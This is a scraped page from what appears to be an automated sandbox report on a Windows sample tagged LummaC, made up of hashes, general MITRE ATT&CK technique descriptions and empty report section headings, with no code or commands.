Snapshot File: hcaresult_0_3_13e7000_6GNqkkKY0j.jbxd

Yara matches

Similarity

API ID:
String ID: 2.5.29.15$p:
API String ID: 0-346634184
Opcode ID: 3605f5a58b86a09e85ff99b4f90634a05a4eec9baf239b2d3b944332bcfde4c0
Instruction ID: 31ecd57395f527255f9834869d7f29799937167c258c054ecfe8e43a273fa65a
Opcode Fuzzy Hash: 3605f5a58b86a09e85ff99b4f90634a05a4eec9baf239b2d3b944332bcfde4c0
Instruction Fuzzy Hash: 5AD12F6144E3C29FC7278BB88864695BFB1AE53228B1E81DBC5D0CF1B3D25D4C5AC762

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6GNqkkKY0j.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
6GNqkkKY0j.exe